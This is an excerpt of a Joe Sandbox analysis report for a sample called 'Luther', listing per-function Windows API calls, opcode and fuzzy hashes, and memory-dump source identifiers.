                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3880355969-0
                                                                                                          • Opcode ID: 308148cee79d6bfab5f6a994ace7250f37855a00e3b3294b0b0a677e43d46afe
                                                                                                          • Instruction ID: 921ac6603e3ee71e6f7b4ba6f7b9306018205d81a4f9573b3cb051de2ab53f4b
                                                                                                          • Opcode Fuzzy Hash: 308148cee79d6bfab5f6a994ace7250f37855a00e3b3294b0b0a677e43d46afe
                                                                                                          • Instruction Fuzzy Hash: BF512D74A00209AFCF24DF64D984EAE7BB6FF44324F10956EF915A7290D731AE82DB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8d9707fb5f43fce0cb55567ddb6c18ed5674ac30c0f41cffa1917d08c687ff48
                                                                                                          • Instruction ID: 8eb72866633ebcb219b5faee6f96f434afb1535100f7fb2eee261909d8e9a77f
                                                                                                          • Opcode Fuzzy Hash: 8d9707fb5f43fce0cb55567ddb6c18ed5674ac30c0f41cffa1917d08c687ff48
                                                                                                          • Instruction Fuzzy Hash: 5C413871A40744AFD728AF78EC41BAABBEDEB88750F10952EF111FB291D37199418780
                                                                                                          APIs
                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EA61C8
                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 00EA61EE
                                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EA6213
                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EA623F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3321077145-0
                                                                                                          • Opcode ID: 03e630527c717b3d4b3b32b1ae1b4c9e7cda767b94a2e9d115098538b24e4c37
                                                                                                          • Instruction ID: d3a5b6bd981edb9fab8546027fc7c3f1202e3e864f0588702a8606685e5fa49d
                                                                                                          • Opcode Fuzzy Hash: 03e630527c717b3d4b3b32b1ae1b4c9e7cda767b94a2e9d115098538b24e4c37
                                                                                                          • Instruction Fuzzy Hash: A4410735600610DFCB11EF15C949A5ABBF2EF8A714B198498E94ABF362CB35FD01CB91
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E9B473
                                                                                                          • SetKeyboardState.USER32(00000080), ref: 00E9B48F
                                                                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E9B4FD
                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E9B54F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 432972143-0
                                                                                                          • Opcode ID: f37635d3e0f64ac8d2d088d6950287450761298deebed17c567234d80d409eea
                                                                                                          • Instruction ID: 0c3ce3c86bf9fce2208e09e7b569d3e6c9a0746cbde9f939291e5fa66f3e0cd8
                                                                                                          • Opcode Fuzzy Hash: f37635d3e0f64ac8d2d088d6950287450761298deebed17c567234d80d409eea
                                                                                                          • Instruction Fuzzy Hash: 51316DB0A002086EFF30CB25AD05BFE7BB6AF44314F04522AE0A5B61D2D37589859791
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E9B5B8
                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E9B5D4
                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E9B63B
                                                                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E9B68D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 432972143-0
                                                                                                          • Opcode ID: fd6452997a3d43dad6dc3a4e7e421839481ed60feb93c9081ccce52cbab2ebfa
                                                                                                          • Instruction ID: 2fe7eec6d5a04e53ff0b193f8f7727e40346297a4f076bfeccf9367cd53751d9
                                                                                                          • Opcode Fuzzy Hash: fd6452997a3d43dad6dc3a4e7e421839481ed60feb93c9081ccce52cbab2ebfa
                                                                                                          • Instruction Fuzzy Hash: BC313C30944608AFFF308B659D05BFE7BB6AF85314F04523EE481B61D2C375AA46CB92
                                                                                                          APIs
                                                                                                          • ClientToScreen.USER32(?,?), ref: 00EC80D4
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00EC814A
                                                                                                          • PtInRect.USER32(?,?,?), ref: 00EC815A
                                                                                                          • MessageBeep.USER32(00000000), ref: 00EC81C6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1352109105-0
                                                                                                          • Opcode ID: 54a93ac0585d8fd6565eb0c7740491a64c86bb533022c3adc25b4131e0ce0834
                                                                                                          • Instruction ID: 8218c27b3bd3d79c941fe00dd6a7012caa1100daf5465edbf6cb655f7426129a
                                                                                                          • Opcode Fuzzy Hash: 54a93ac0585d8fd6565eb0c7740491a64c86bb533022c3adc25b4131e0ce0834
                                                                                                          • Instruction Fuzzy Hash: 72417A30A02219DFCB15CF59CB84FA9B7F5FB49314F1851ACE954AB261CB32A847DB90
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32 ref: 00EC2187
                                                                                                            • Part of subcall function 00E94393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E943AD
                                                                                                            • Part of subcall function 00E94393: GetCurrentThreadId.KERNEL32 ref: 00E943B4
                                                                                                            • Part of subcall function 00E94393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E92F00), ref: 00E943BB
                                                                                                          • GetCaretPos.USER32(?), ref: 00EC219B
                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00EC21E8
                                                                                                          • GetForegroundWindow.USER32 ref: 00EC21EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2759813231-0
                                                                                                          • Opcode ID: a3f1e2e0526336d41cdbdc6cda40ff396de25763ce5e56244af77a4656df6a0e
                                                                                                          • Instruction ID: fc0c280ef89f0f4ebbfc1333d51c2046ea32b783ccf630d9bdd5403c2fdec786
                                                                                                          • Opcode Fuzzy Hash: a3f1e2e0526336d41cdbdc6cda40ff396de25763ce5e56244af77a4656df6a0e
                                                                                                          • Instruction Fuzzy Hash: 6E3150B1D01209AFCB04DFA5C985DAEBBF8EF48304B54506EE515F7251D7319E46CBA0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E341EA: _wcslen.LIBCMT ref: 00E341EF
                                                                                                          • _wcslen.LIBCMT ref: 00E9E8E2
                                                                                                          • _wcslen.LIBCMT ref: 00E9E8F9
                                                                                                          • _wcslen.LIBCMT ref: 00E9E924
                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00E9E92F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$ExtentPoint32Text
                                                                                                          • String ID:
                                                                                                          • API String ID: 3763101759-0
                                                                                                          • Opcode ID: bf91319169f4cdee23d4fece0432d68c00455abf06b9340e88f0a62a9acd6b1d
                                                                                                          • Instruction ID: 02adb79eef4093d48472ded15c6e3b13725e91f68b572d7faf4fe58cb3043af1
                                                                                                          • Opcode Fuzzy Hash: bf91319169f4cdee23d4fece0432d68c00455abf06b9340e88f0a62a9acd6b1d
                                                                                                          • Instruction Fuzzy Hash: C321A3B1901214AFDF10EFA8D982BAEB7F8EF85755F1450A4F904BB381D6709E41C7A1
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0
                                                                                                          • GetCursorPos.USER32(?), ref: 00EC9A5D
                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EC9A72
                                                                                                          • GetCursorPos.USER32(?), ref: 00EC9ABA
                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00EC9AF0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2864067406-0
                                                                                                          • Opcode ID: 4d31650790b0e9e532d6834bb936af5e64de675eaf60a39e07ed3a87593dda7f
                                                                                                          • Instruction ID: 0236d4fe67ffc5a0824f261c2c6a4ff7cd8a4e6bf5948c9b38452fea1e35268c
                                                                                                          • Opcode Fuzzy Hash: 4d31650790b0e9e532d6834bb936af5e64de675eaf60a39e07ed3a87593dda7f
                                                                                                          • Instruction Fuzzy Hash: 73217A35600018BFCF258F95C84CEEA7BB9FB49354F404169FA05AB1A2D7329952EB60
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNEL32(?,00ECDC30), ref: 00E9DBA6
                                                                                                          • GetLastError.KERNEL32 ref: 00E9DBB5
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E9DBC4
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00ECDC30), ref: 00E9DC21
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 2267087916-0
                                                                                                          • Opcode ID: b526ae8475c46610e8151ed8a57a97c9b30c855382bbca4fd8d3f7b141b792b1
                                                                                                          • Instruction ID: 215569b5e388c0ad32f516eb3845c4f6d9e6fc62428bcab6d1ea17d9e50898e8
                                                                                                          • Opcode Fuzzy Hash: b526ae8475c46610e8151ed8a57a97c9b30c855382bbca4fd8d3f7b141b792b1
                                                                                                          • Instruction Fuzzy Hash: EC21917110C3159F8B00DF28CD8499ABBE8EF56368F101A2DF499E32A1D732D94ACB42
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00EC32A6
                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC32C0
                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC32CE
                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EC32DC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                          • String ID:
                                                                                                          • API String ID: 2169480361-0
                                                                                                          • Opcode ID: 13a68ad6b225d4756f9802f158133a7baed6cdb862cb35dcefb8d7ae2d600ac8
                                                                                                          • Instruction ID: a33b97a667034510096ca74483ca8ce34a79cd72c7fe1c5ef1d0ac6310119628
                                                                                                          • Opcode Fuzzy Hash: 13a68ad6b225d4756f9802f158133a7baed6cdb862cb35dcefb8d7ae2d600ac8
                                                                                                          • Instruction Fuzzy Hash: 0A219431204511AFD7189B24C845F6A7B95AB81314F24815DF826AB2A1C773ED42C7D0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E996E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E98271,?,000000FF,?,00E990BB,00000000,?,0000001C,?,?), ref: 00E996F3
                                                                                                            • Part of subcall function 00E996E4: lstrcpyW.KERNEL32(00000000,?,?,00E98271,?,000000FF,?,00E990BB,00000000,?,0000001C,?,?,00000000), ref: 00E99719
                                                                                                            • Part of subcall function 00E996E4: lstrcmpiW.KERNEL32(00000000,?,00E98271,?,000000FF,?,00E990BB,00000000,?,0000001C,?,?), ref: 00E9974A
                                                                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E990BB,00000000,?,0000001C,?,?,00000000), ref: 00E9828A
                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,00E990BB,00000000,?,0000001C,?,?,00000000), ref: 00E982B0
                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E990BB,00000000,?,0000001C,?,?,00000000), ref: 00E982EB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                          • String ID: cdecl
                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                          • Opcode ID: 8e42d273d2f966284c89b381cbf64de4e0a92583c711d9548010102afb600064
                                                                                                          • Instruction ID: 880c6aacb4dd5b04fe4a3859bec630ff806cae3477784bf214018696e85ca80d
                                                                                                          • Opcode Fuzzy Hash: 8e42d273d2f966284c89b381cbf64de4e0a92583c711d9548010102afb600064
                                                                                                          • Instruction Fuzzy Hash: 0D11E17A200241AFCF149F38C844E7A77E9FF4A754B10502AF942D7261EF329812C791
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 00EC615A
                                                                                                          • _wcslen.LIBCMT ref: 00EC616C
                                                                                                          • _wcslen.LIBCMT ref: 00EC6177
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC62B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 455545452-0
                                                                                                          • Opcode ID: c917e1731253c61d5f6835f517c81cb3e519fafcee86d876b14ecbaa511d0b60
                                                                                                          • Instruction ID: e5c5d2150237365ce22491af0a5fa01c8edf33bf202e200200e0c2f0227cb1f8
                                                                                                          • Opcode Fuzzy Hash: c917e1731253c61d5f6835f517c81cb3e519fafcee86d876b14ecbaa511d0b60
                                                                                                          • Instruction Fuzzy Hash: E011067560020896DB10DF648E84FEF77BCEB51358B14502FF905F5181E772C986CB60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fff41ae51f8e619b8fd620c753fff0e9cc66662cf25b6218bf8ac7188ed11140
                                                                                                          • Instruction ID: ad6512c14a06404e97d1c3fdb1f2b4fa16108e78867ac5aedfed026af9bcc9ef
                                                                                                          • Opcode Fuzzy Hash: fff41ae51f8e619b8fd620c753fff0e9cc66662cf25b6218bf8ac7188ed11140
                                                                                                          • Instruction Fuzzy Hash: 6C01F2B228AA067EF66026787CC0F67674DDF423FCB34632DB631B11D1DA718C409160
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E92394
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E923A6
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E923BC
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E923D7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 8cae224eb7a2b4a1261b1f914140e474c2fe2bf5685c6361c43f80a938e755c0
                                                                                                          • Instruction ID: 9ab6a495157946c0dc9c7f248244f1ec0bc9176bfc8fa0a582b5692f6912316a
                                                                                                          • Opcode Fuzzy Hash: 8cae224eb7a2b4a1261b1f914140e474c2fe2bf5685c6361c43f80a938e755c0
                                                                                                          • Instruction Fuzzy Hash: 4C11273A900219FFEF11DBA5CD85F9DBBB8EB08750F2000A5EA00B7290D6716E10DB94
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0
                                                                                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00E31AF4
                                                                                                          • GetClientRect.USER32(?,?), ref: 00E731F9
                                                                                                          • GetCursorPos.USER32(?), ref: 00E73203
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00E7320E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 4127811313-0
                                                                                                          • Opcode ID: a1c478b6fd0a4c86d38c88597ef80c4f4dadeae7e13ede9d0b8b32145eca2603
                                                                                                          • Instruction ID: f6da3d7abea6dffbc5d870c07914ab406915fb57368cf47153c36a4a33d8f77f
